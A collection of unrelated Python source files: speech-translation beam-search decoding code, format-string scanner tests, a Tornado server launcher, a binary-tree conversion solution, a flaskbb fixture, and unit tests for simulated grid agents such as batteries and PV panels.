cross_self=self.cross_self, cross_src=self.cross_src)[0]
V = local_att_scores.shape[-1]
all_scores.append(local_att_scores)
local_scores = torch.cat(all_scores, dim=-1)
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
local_best_ids = local_best_ids % V
else:
local_scores = decoder.forward_one_step(ys, ys_mask, enc_output)[0]
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
return hyps_best_kept
def process_hypothesis(self, i, hyps, ended_hyps, maxlen, minlen, trans_args, eos, rnnlm=None):
stop_decoding = False
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
            logging.info('adding <eos> at the last position in the loop')
for hyp in hyps:
hyp['yseq'].append(eos)
        # add ended hypotheses to a final list, and remove them from the current
        # hypotheses (otherwise the number of hyps can fall below the beam size)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == eos:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * trans_args.penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += trans_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
stop_decoding = True
hyps = remained_hyps
if len(hyps) > 0:
            logging.debug('remaining hypotheses: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
stop_decoding = True
return hyps, ended_hyps, stop_decoding
def recognize_and_translate_separate(self, x, trans_args,
char_list_tgt=None,
char_list_src=None,
rnnlm=None,
use_jit=False):
"""Translate input speech.
:param ndnarray x: input acoustic feature (B, T, D) or (T, D)
:param Namespace trans_args: argment Namespace contraining options
:param list char_list_tgt: list of characters for target languages
:param list char_list_src: list of characters for source languages
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
        # prepare sos
if getattr(trans_args, "tgt_lang", False):
            if getattr(self, "replace_sos", False):
y = char_list_tgt.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.one_to_many and self.lang_tok == 'decoder-pre':
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
y = char_list_tgt.index(tgt_lang_id)
logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[0])
y_asr = char_list_src.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y_asr: {y_asr}')
else:
y = self.sos_tgt
y_asr = self.sos_src
logging.info(f'<sos> index: {str(y)}; <sos> mark: {char_list_tgt[y]}')
logging.info(f'<sos> index asr: {str(y_asr)}; <sos> mark asr: {char_list_src[y_asr]}')
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
        # search params
beam = trans_args.beam_size
beam_cross = trans_args.beam_cross_size
penalty = trans_args.penalty
assert beam_cross <= beam
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
if trans_args.maxlenratio_asr == 0:
maxlen_asr = h.shape[0]
else:
maxlen_asr = max(1, int(trans_args.maxlenratio_asr * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
minlen_asr = int(trans_args.minlenratio_asr * h.size(0))
logging.info(f'max output length: {str(maxlen)}; min output length: {str(minlen)}')
logging.info(f'max output length asr: {str(maxlen_asr)}; min output length asr: {str(minlen_asr)}')
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
hyp_asr = {'score': 0.0, 'yseq': [y_asr]}
hyps = [hyp]
hyps_asr = [hyp_asr]
ended_hyps = []
ended_hyps_asr = []
stop_decoding_st = False
stop_decoding_asr = False
hyps_st_candidates = hyps
hyps_asr_candidates = hyps_asr
traced_decoder = None
for i in six.moves.range(maxlen + self.wait_k_asr):
logging.info('position ' + str(i))
# Start ASR first, then after self.wait_k_asr steps, start ST
# ASR SEARCH
if i < maxlen and not stop_decoding_asr:
decoder_cross = self.decoder if self.cross_to_asr else None
hyps_asr = self.update_hypothesis(i, beam,
hyps_asr,
hyps_st_candidates,
enc_output,
self.eos_tgt,
decoder=self.decoder_asr,
decoder_cross=decoder_cross,
wait_k_cross=self.wait_k_st
)
hyps_asr, ended_hyps_asr, stop_decoding_asr = self.process_hypothesis(i,
hyps_asr,
ended_hyps_asr,
maxlen_asr,
minlen_asr,
trans_args,
self.eos_src,
rnnlm=rnnlm
)
hyps_asr_candidates = sorted(hyps_asr + ended_hyps_asr,
key=lambda x: x['score'], reverse=True)[:beam_cross]
if char_list_src is not None:
for hyp in hyps_asr:
logging.info('hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyp['yseq']]))
# ST SEARCH
if i >= self.wait_k_asr and not stop_decoding_st:
decoder_cross = self.decoder_asr if self.cross_to_st else None
hyps = self.update_hypothesis(i - self.wait_k_asr, beam,
hyps, hyps_asr_candidates,
enc_output,
self.eos_src,
decoder=self.decoder,
decoder_cross=decoder_cross,
wait_k_cross=self.wait_k_asr
)
hyps, ended_hyps, stop_decoding_st = self.process_hypothesis(i - self.wait_k_asr,
hyps, ended_hyps,
maxlen, minlen,
trans_args,
self.eos_tgt,
rnnlm=rnnlm
)
hyps_st_candidates = sorted(hyps + ended_hyps,
key=lambda x: x['score'], reverse=True)[:beam_cross]
if char_list_tgt is not None:
for hyp in hyps:
logging.info('hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyp['yseq']]))
# Stop decoding check
if stop_decoding_asr and stop_decoding_st:
break
        nbest_hyps = sorted(
            ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
        nbest_hyps_asr = sorted(
            ended_hyps_asr, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps_asr), trans_args.nbest)]
        # check the number of hypotheses before indexing into the n-best lists
        if len(nbest_hyps) == 0 or len(nbest_hyps_asr) == 0:
            logging.warning('there are no N-best results; performing recognition again with a smaller minlenratio.')
            # should copy because Namespace will be overwritten globally
            trans_args = Namespace(**vars(trans_args))
            trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
            return self.recognize_and_translate_separate(x, trans_args, char_list_tgt, char_list_src, rnnlm, use_jit)
        logging.info('best hypo: ' + ''.join([char_list_tgt[int(x)] for x in nbest_hyps[0]['yseq']]))
        logging.info('best hypo asr: ' + ''.join([char_list_src[int(x)] for x in nbest_hyps_asr[0]['yseq']]))
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps, nbest_hyps_asr
def recognize_and_translate_sum(self, x, trans_args,
char_list_tgt=None,
char_list_src=None,
rnnlm=None,
use_jit=False,
decode_asr_weight=1.0,
score_is_prob=False,
ratio_diverse_st=0.0,
ratio_diverse_asr=0.0,
use_rev_triu_width=0,
use_diag=False,
debug=False):
"""Recognize and translate input speech.
        :param ndarray x: input acoustic feature (B, T, D) or (T, D)
        :param Namespace trans_args: argument Namespace containing options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
        assert self.do_asr, "Joint recognition and translation requires an ASR decoder (do_asr)."
self.wait_k_asr = max(self.wait_k_asr, getattr(trans_args, "wait_k_asr", 0))
self.wait_k_st = max(self.wait_k_st, getattr(trans_args, "wait_k_st", 0))
logging.info(f'| ratio_diverse_st = {ratio_diverse_st}')
logging.info(f'| ratio_diverse_asr = {ratio_diverse_asr}')
logging.info(f'| wait_k_asr = {self.wait_k_asr}')
logging.info(f'| wait_k_st = {self.wait_k_st}')
# prepare sos
if getattr(trans_args, "tgt_lang", False):
            if getattr(self, "replace_sos", False):
y = char_list_tgt.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.use_lid and self.lang_tok == 'decoder-pre':
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
y = char_list_tgt.index(tgt_lang_id)
logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[0])
y_asr = char_list_src.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y_asr: {y_asr}')
else:
y = self.sos_tgt
y_asr = self.sos_src
logging.info(f'<sos> index: {str(y)}; <sos> mark: {char_list_tgt[y]}')
logging.info(f'<sos> index asr: {str(y_asr)}; <sos> mark asr: {char_list_src[y_asr]}')
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
        # search params
beam = trans_args.beam_size
penalty = trans_args.penalty
vy = h.new_zeros(1).long()
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
if trans_args.maxlenratio_asr == 0:
maxlen_asr = h.shape[0]
else:
maxlen_asr = max(1, int(trans_args.maxlenratio_asr * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
minlen_asr = int(trans_args.minlenratio_asr * h.size(0))
logging.info(f'max output length: {str(maxlen)}; min output length: {str(minlen)}')
logging.info(f'max output length asr: {str(maxlen_asr)}; min output length asr: {str(minlen_asr)}')
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
logging.info('initializing hypothesis...')
hyp = {'score': 0.0, 'yseq': [y], 'yseq_asr': [y_asr]}
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(max(maxlen, maxlen_asr)):
logging.info('position ' + str(i))
hyps_best_kept = []
for idx, hyp in enumerate(hyps):
if self.wait_k_asr > 0:
if i < self.wait_k_asr:
ys_mask = subsequent_mask(1).unsqueeze(0)
else:
ys_mask = subsequent_mask(i - self.wait_k_asr + 1).unsqueeze(0)
else:
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
if self.wait_k_st > 0:
if i < self.wait_k_st:
ys_mask_asr = subsequent_mask(1).unsqueeze(0)
else:
ys_mask_asr = subsequent_mask(i - self.wait_k_st + 1).unsqueeze(0)
else:
ys_mask_asr = subsequent_mask(i + 1).unsqueeze(0)
ys_asr = torch.tensor(hyp['yseq_asr']).unsqueeze(0)
start = time.time()
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
traced_decoder = torch.jit.trace(self.decoder.forward_one_step,
(ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
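# ASR branch: expand the ASR hypothesis only once wait_k_st decoding steps have
# passed (the ST stream leads by k tokens) and while ASR has not emitted <eos>.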
if (hyp['yseq_asr'][-1] != self.eos_src or i < 2) and i >= self.wait_k_st:
if self.cross_to_asr:
y_cross = self.decoder.embed(ys)
cross_mask_asr = create_cross_mask(ys_asr, ys, self.ignore_id, wait_k_cross=self.wait_k_st)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = self.decoder.decoders[0].norm1(y_cross)
local_att_scores_asr = self.decoder_asr.forward_one_step(ys_asr, ys_mask_asr, enc_output,
cross=y_cross, cross_mask=cross_mask_asr,
cross_self=self.cross_self, cross_src=self.cross_src)[0]
else:
local_att_scores_asr = self.decoder_asr.forward_one_step(ys_asr, ys_mask_asr, enc_output)[0]
# If using 2 separate dictionaries
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores_asr = self.output_layer_asr(local_att_scores_asr)
if score_is_prob:
local_att_scores_asr = torch.exp(local_att_scores_asr)
else:
local_att_scores_asr = None
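# ST branch: symmetrically, expand the translation hypothesis only after
# wait_k_asr steps (the ASR stream leads) and while ST has not emitted <eos>.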
if (hyp['yseq'][-1] != self.eos_tgt or i < 2) and i >= self.wait_k_asr:
if self.cross_to_st:
cross_mask = create_cross_mask(ys, ys_asr, self.ignore_id, wait_k_cross=self.wait_k_asr)
y_cross = self.decoder_asr.embed(ys_asr)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = self.decoder_asr.decoders[0].norm1(y_cross)
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output,
cross=y_cross, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)[0]
else:
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output)[0]
# If using 2 separate dictionaries
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer(local_att_scores)
if score_is_prob:
local_att_scores = torch.exp(local_att_scores)
else:
local_att_scores = None
start = time.time()
if local_att_scores is not None and local_att_scores_asr is not None:
local_att_scores_asr = decode_asr_weight * local_att_scores_asr
xk, ixk = local_att_scores.topk(beam)
yk, iyk = local_att_scores_asr.topk(beam)
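# Joint beam scores: S[i, j] = xk[i] + yk[j] for every pair of ST candidate i
# and ASR candidate j (a beam x beam matrix built from outer sums); s2v maps
# each flattened position of S back to its (st_token_id, asr_token_id) pair.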
S = (torch.mm(torch.t(xk), torch.ones_like(xk))
+ torch.mm(torch.t(torch.ones_like(yk)), yk))
s2v = torch.LongTensor([[i, j] for i in ixk.squeeze(0) for j in iyk.squeeze(0)]) # (k^2) x 2
# Do not force diversity
if ratio_diverse_st <= 0 and ratio_diverse_asr <=0:
local_best_scores, id2k = S.view(-1).topk(beam)
I = s2v[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for ST only
if ratio_diverse_st > 0 and ratio_diverse_asr <= 0:
ct = int((1 - ratio_diverse_st) * beam)
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:, :ct]
local_best_scores, id2k = Sc.flatten().topk(beam)
I = s2v[:, :ct]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for ASR only
if ratio_diverse_asr > 0 and ratio_diverse_st <= 0:
cr = int((1 - ratio_diverse_asr) * beam)
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:cr, :]
local_best_scores, id2k = Sc.view(-1).topk(beam)
I = s2v[:cr, :]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for both ST and ASR
if ratio_diverse_st > 0 and ratio_diverse_asr > 0:
cr = int((1 - ratio_diverse_asr) * beam)
ct = int((1 - ratio_diverse_st) * beam)
ct = max(ct, math.ceil(beam / cr))  # true ceiling division (beam // cr would floor before ceil)
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:cr, :ct]
local_best_scores, id2k = Sc.flatten().topk(beam)
I = s2v[:cr, :ct]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
elif local_att_scores is not None:
local_best_scores, local_best_ids_st = torch.topk(local_att_scores, beam, dim=1)
local_best_scores = local_best_scores.squeeze(0)
local_best_ids_st = local_best_ids_st.squeeze(0)
elif local_att_scores_asr is not None:
local_best_scores, local_best_ids_asr = torch.topk(local_att_scores_asr, beam, dim=1)
local_best_ids_asr = local_best_ids_asr.squeeze(0)
local_best_scores = local_best_scores.squeeze(0)
else:
raise NotImplementedError
if debug:
logging.info(f'score time = {time.time() - start}')
start = time.time()
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq_asr'] = [0] * (1 + len(hyp['yseq_asr']))
new_hyp['yseq_asr'][:len(hyp['yseq_asr'])] = hyp['yseq_asr']
if local_att_scores is not None:
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids_st[j])
else:
if i >= self.wait_k_asr:
new_hyp['yseq'][len(hyp['yseq'])] = self.eos_tgt
else:
new_hyp['yseq'] = hyp['yseq']
if local_att_scores_asr is not None:
new_hyp['yseq_asr'][len(hyp['yseq_asr'])] = int(local_best_ids_asr[j])
else:
if i >= self.wait_k_st:
new_hyp['yseq_asr'][len(hyp['yseq_asr'])] = self.eos_src
else:
new_hyp['yseq_asr'] = hyp['yseq_asr']
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
logging.debug('number of pruned hypotheses: ' + str(len(hyps)))
# add <eos> in the final loop so that at least some hypotheses end
if i == maxlen - 1:
logging.info('adding <eos> at the last position in the loop')
for hyp in hyps:
if hyp['yseq'][-1] != self.eos_tgt:
hyp['yseq'].append(self.eos_tgt)
if i == maxlen_asr - 1:
logging.info('adding <eos> at the last position in the loop for asr')
for hyp in hyps:
if hyp['yseq_asr'][-1] != self.eos_src:
hyp['yseq_asr'].append(self.eos_src)
# move ended hypotheses to the final list and remove them from the current hypotheses
# (note: after this the number of hyps can be smaller than beam)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_tgt and hyp['yseq_asr'][-1] == self.eos_src:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen and len(hyp['yseq_asr']) > minlen_asr:
hyp['score'] += (i + 1) * penalty
# if rnnlm: # Word LM needs to add final <eos> score
# hyp['score'] += trans_args.lm_weight * rnnlm.final(
# hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
if len(hyps) > 0:
logging.info('remaining hypotheses: ' + str(len(hyps)))
else:
logging.info('no hypotheses remain. Finish decoding.')
break
if char_list_tgt is not None and char_list_src is not None:
for hyp in hyps:
logging.info('hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyp['yseq']]))
logging.info('hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyp['yseq_asr']]))
logging.info('best hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyps[0]['yseq']]))
logging.info('best hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyps[0]['yseq_asr']]))
logging.info('number of ended hypotheses: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
# check the number of hypotheses
if len(nbest_hyps) == 0:
logging.warning('there are no N-best results; performing recognition again with a smaller minlenratio.')
# should copy because Namespace will be overwritten globally
trans_args = Namespace(**vars(trans_args))
trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
trans_args.minlenratio_asr = max(0.0, trans_args.minlenratio_asr - 0.1)
return self.recognize_and_translate_sum(x, trans_args, char_list_tgt, char_list_src, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
def calculate_all_attentions(self, xs_pad, ilens, ys_pad, ys_pad_src):
"""E2E attention calculation.
:param torch.Tensor xs_pad: batch of padded input sequences (B, Tmax, idim)
:param torch.Tensor ilens: batch of lengths of input sequences (B)
:param torch.Tensor ys_pad: batch of padded token id sequence tensor (B, Lmax)
:param torch.Tensor ys_pad_src: batch of padded token id sequence tensor (B, Lmax)
:return: attention weights with the following shape,
1) multi-head case => attention weights (B, H, Lmax, Tmax),
2) other case => attention weights (B, Lmax, Tmax).
:rtype: float ndarray
"""
with torch.no_grad():
self.forward(xs_pad, ilens, ys_pad, ys_pad_src)
ret = dict()
for name, m in self.named_modules():
if isinstance(m, MultiHeadedAttention) and m.attn is not None: # skip MHA for submodules
ret[name] = m.attn.cpu().numpy()
return ret
|
from . import check, v
assert v # Silence pyflakes.
def test_old_format_string(v):
v.scan("'%(a)s, %(b)d' % locals()")
check(v.used_names, ['a', 'b', 'locals'])
def test_new_format_string(v):
v.scan("'{a}, {b:0d} {c:<30} {d:.2%}'.format(**locals())")
check(v.used_names, ['a', 'b', 'c', 'd', 'locals'])
def test_new_format_string_access(v):
v.scan("'{a.b}, {c.d.e} {f[g]} {h[i][j]}'.format(**locals())")
check(v.used_names, ['a', 'c', 'f', 'h', 'locals'])
def test_new_format_string_attributes(v):
v.scan("'{a.b}, {c.d.e} {f[g]} {h[i][j].k}'.format(**locals())")
check(v.used_names, ['a', 'c', 'f', 'h', 'locals'])
check(v.used_attrs, ['b', 'd', 'e', 'k', 'format'])
def test_new_format_string_numbers(v):
v.scan("'{0.b}, {0.d.e} {0[1]} {0[1][1].k}'.format('foo')")
check(v.used_names, [])
check(v.used_attrs, ['b', 'd', 'e', 'k', 'format'])
def test_incorrect_format_string(v):
v.scan('"{"')
v.scan('"{!-a:}"')
check(v.used_names, [])
check(v.used_attrs, [])
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
启动系统服务器
默认参数保存在 settings.py 中,也可以通过命令行指定(--help 查看所有的命令行参数)。
如果要使用 80 等端口,可能需要 "sudo ./run.py --port=80"。
"""
import threading
from datetime import datetime
from pprint import pprint
from optparse import OptionParser, OptionGroup
from tornadoweb import *
from action import *
import settings
def _show_info(app):
"""
显示系统信息
"""
print ("Server start on port {0} (processes: {1}) ...".format(app.port, app.processes))
print ("Start time: {0}".format(datetime.now().isoformat(" ")))
print()
print ("Parameters:")
for k in sorted(dir(__conf__)):
if k.startswith("__"): continue
print (" {0:<20} : {1}".format(k, getattr(__conf__, k)))
print()
print ("Handlers:")
handlers = sorted(app.handlers, key = lambda h: h[0])
pprint(handlers)
print()
def _get_opt():
parser = OptionParser("%prog [options]", version="%prog v0.9")
parser.add_option("--port", dest = "port", default = 0, help = "Listen port.")
parser.add_option("--config", dest = "config", default = "settings.py", help = "config")
return parser.parse_args()
def main():
opts, args = _get_opt()
ConfigLoader.load(opts.config)
run(port = opts.port, config = opts.config, callback = _show_info)
if __name__ == "__main__":
main()
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def convertBiNode(self, root: TreeNode) -> TreeNode:
self.root = self.leaf = TreeNode()
self.inorderTraverse(root)
return self.root.right
def inorderTraverse(self, root: TreeNode) -> None:
if not root: return
self.inorderTraverse(root.left)
self.leaf.right = root
self.leaf = root
root.left = None
self.inorderTraverse(root.right)
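# Illustrative usage sketch (assumes the TreeNode class from the header comment):
# root = TreeNode(2); root.left = TreeNode(1); root.right = TreeNode(3)
# head = Solution().convertBiNode(root)
# while head:  # visits 1, 2, 3 in sorted order
#     print(head.val)
#     head = head.right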
|
import pytest
from flaskbb.plugins.manager import FlaskBBPluginManager
@pytest.fixture
def plugin_manager():
return FlaskBBPluginManager("flaskbb")
|
"""Test agent"""
import unittest
# from aries.core.grid.agent import Agent, Battery, ElectricalVehicle, PVPanel, WaterTank, WindGenerator
import aries.core.grid.agent as agent
# Agent constants
AGENT_NAME = "agent1"
VOLTAGE_RATING = 230
POWER_RATING = 1900
POWER_FACTOR = 0.95
INCOMING_POWER = 1234
REQUEST_INJECT_POWER = 123
REQUEST_POWER_FACTOR = 0.95
# Battery constants
VOLTAGE = 24
CAPACITY = 1296000
STATUS = 123414
CONTRIBUTION_ACTIVE = 0.5
CONTRIBUTION_REACTIVE = 0.3
INVERTER_INPUT_VOLTAGE = 24
INVERTER_OUTPUT_VOLTAGE = 230
INVERTER_EFFICIENCY = 0.87
ACTIVE = 0
# ElectricalVehicle constants
CONSUMPTION = 20
CHARGE_CURRENT = 123
POWER_SUPPLIER = 1
# PV panel constants
UNIT_AREA = 1
SERIES = 50
PARALLELS = 50
EFFICIENCY = 0.8
SOLAR_IRRADIANCE = 100
BATTERY_COUPLING_EFFICIENCY = 1
HEATING_CONTRIBUTION = 200
# Water tank properties
TEMP = 80
RESISTANCE = 50
# Wind generator properties
WIND_SPEED = 10
POWER_COEFFICIENT = 0.59
AIR_DENSITY = 1.225
AREA = 2
class TestAgent(unittest.TestCase):
"""Tests for agent"""
def test_agent_assigned_properties(self):
self.agent = agent.Agent.from_properties(name=AGENT_NAME, voltage_rating=VOLTAGE_RATING, power_rating=POWER_RATING,
power_factor=POWER_FACTOR, incoming_power=INCOMING_POWER,
request_inject_power=REQUEST_INJECT_POWER,
request_power_factor=REQUEST_POWER_FACTOR)
self.assertEqual(self.agent.name, AGENT_NAME, "name is not equal")
self.assertEqual(self.agent.voltage_rating, VOLTAGE_RATING, "voltage_rating is not equal")
self.assertEqual(self.agent.power_rating, POWER_RATING, "power_rating is not equal")
self.assertEqual(self.agent.power_factor, POWER_FACTOR, "power_factor is not equal")
self.assertEqual(self.agent.incoming_power, INCOMING_POWER, "incoming_power is not equal")
self.assertEqual(self.agent.request_inject_power, REQUEST_INJECT_POWER, "request_inject_power is not equal")
self.assertEqual(self.agent.request_power_factor, REQUEST_POWER_FACTOR, "request_power_factor is not equal")
def test_validation(self):
"""Tests agent validation"""
j = {
"name": "test",
"voltage_rating": 123,
"power_rating": 1,
"power_factor": 1,
"incoming_power": 1,
"request_inject_power": 456,
"request_power_factor": 0.95
}
self.assertTrue(agent.Agent.validate(j), "Agent is not valid")
class TestBattery(unittest.TestCase):
"""Tests for battery"""
def setUp(self):
self.battery = agent.Battery.from_properties(voltage=VOLTAGE, capacity=CAPACITY, status=STATUS,
contribution_active=CONTRIBUTION_ACTIVE,
contribution_reactive=CONTRIBUTION_REACTIVE,
inverter_input_voltage=INVERTER_INPUT_VOLTAGE,
inverter_output_voltage=INVERTER_OUTPUT_VOLTAGE,
inverter_efficiency=INVERTER_EFFICIENCY,
active=ACTIVE)
def test_battery_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.battery.voltage, VOLTAGE, "voltage is not equal")
self.assertEqual(self.battery.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.battery.status, STATUS, "status is not equal")
self.assertEqual(self.battery.contribution_active, CONTRIBUTION_ACTIVE, "contribution_active is not equal")
self.assertEqual(self.battery.contribution_reactive, CONTRIBUTION_REACTIVE,
"contribution_reactive is not equal")
self.assertEqual(self.battery.inverter_input_voltage, INVERTER_INPUT_VOLTAGE,
"inverter_input_voltage is not equal")
self.assertEqual(self.battery.inverter_output_voltage, INVERTER_OUTPUT_VOLTAGE,
"inverter_output_voltage is not equal")
self.assertEqual(self.battery.inverter_efficiency, INVERTER_EFFICIENCY, "inverter_efficiency is not equal")
self.assertEqual(self.battery.active, ACTIVE, "active is not equal")
class TestElectricalVehicle(unittest.TestCase):
"""Tests for electrical vehicle"""
def setUp(self):
self.electrical_vehicle = agent.ElectricalVehicle.from_properties(voltage=VOLTAGE, capacity=CAPACITY,
status=STATUS,
consumption=CONSUMPTION,
contribution_active=CONTRIBUTION_ACTIVE,
contribution_reactive=CONTRIBUTION_REACTIVE,
inverter_input_voltage=INVERTER_INPUT_VOLTAGE,
inverter_output_voltage=INVERTER_OUTPUT_VOLTAGE,
inverter_efficiency=INVERTER_EFFICIENCY,
charge_current=CHARGE_CURRENT,
power_supplier=POWER_SUPPLIER,
active=ACTIVE)
def test_electrical_vehicle_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.electrical_vehicle.voltage, VOLTAGE, "voltage is not equal")
self.assertEqual(self.electrical_vehicle.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.electrical_vehicle.status, STATUS, "status is not equal")
self.assertEqual(self.electrical_vehicle.consumption, CONSUMPTION, "consumption is not equal")
self.assertEqual(self.electrical_vehicle.contribution_active, CONTRIBUTION_ACTIVE,
"contribution_active is not equal")
self.assertEqual(self.electrical_vehicle.contribution_reactive, CONTRIBUTION_REACTIVE,
"contribution_reactive is not equal")
self.assertEqual(self.electrical_vehicle.inverter_input_voltage, INVERTER_INPUT_VOLTAGE,
"inverter_input_voltage is not equal")
self.assertEqual(self.electrical_vehicle.inverter_output_voltage, INVERTER_OUTPUT_VOLTAGE,
"inverter_output_voltage is not equal")
self.assertEqual(self.electrical_vehicle.inverter_efficiency, INVERTER_EFFICIENCY,
"inverter_efficiency is not equal")
self.assertEqual(self.electrical_vehicle.charge_current, CHARGE_CURRENT, "charge_current is not equal")
self.assertEqual(self.electrical_vehicle.power_supplier, POWER_SUPPLIER, "power_supplier is not equal")
self.assertEqual(self.electrical_vehicle.active, ACTIVE, "active is not equal")
class TestPVPanel(unittest.TestCase):
"""Test for PV panel"""
def setUp(self):
self.pv_panel = agent.PVPanel.from_properties(unit_area=UNIT_AREA, series=SERIES, parallels=PARALLELS,
efficiency=EFFICIENCY,
solar_irradiance=SOLAR_IRRADIANCE,
battery_coupling_efficiency=BATTERY_COUPLING_EFFICIENCY,
heating_contribution=HEATING_CONTRIBUTION,
active=ACTIVE)
def test_pv_panel_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.pv_panel.series, SERIES, "series is not equal")
self.assertEqual(self.pv_panel.parallels, PARALLELS, "parallels is not equal")
self.assertEqual(self.pv_panel.efficiency, EFFICIENCY, "efficiency is not equal")
